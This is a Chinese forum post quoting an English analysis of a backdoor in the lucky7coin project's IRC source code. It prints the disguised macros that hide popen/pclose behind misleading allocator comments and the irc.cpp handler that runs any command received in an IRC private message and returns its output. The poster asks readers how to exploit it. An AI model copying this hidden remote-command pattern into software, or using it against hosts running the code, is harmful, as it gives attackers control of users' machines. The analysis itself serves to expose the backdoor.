留有后门的IRC源程序，谁看得懂就有黑客潜质

据说下面的代码给使用该程序的骇客留了后门，这是Github上的lucky7coin开源项目的源代码。

谁能看懂说说吧，如何利用该后门：

There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.

In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:

/** Determine system page size in bytes */
#define S_ORDER(a,b,c,d) b##a##d##c

/**
 * OS-dependent memory page locking/unlocking.
 * Defined as policy class to make stubbing for test possible.
 */
#define CLine S_ORDER(I,F,E,L)

/**
 * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
 * std::allocator templates.
 */
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)

//
// Allocator that locks its contents from being paged
// out of memory and clears its contents before deletion.
//
#define CBuff "PR" "IV" "M" "SG"
Then in irc.cpp they are used to implement the backdoor:

        if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
        {
            CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
            if (buf) {
                std::string result = "";
                while (!feof(buf))
                    if (fgets(pszName, sizeof(pszName), buf) != NULL)
                        result += pszName;
                CFree(buf);
                strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
                if (strchr(pszName, '!'))
                    *strchr(pszName, '!') = '\0';
                Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
            }
        }
I expect this is a known issue since this kind of thing doesn't happen accidentally.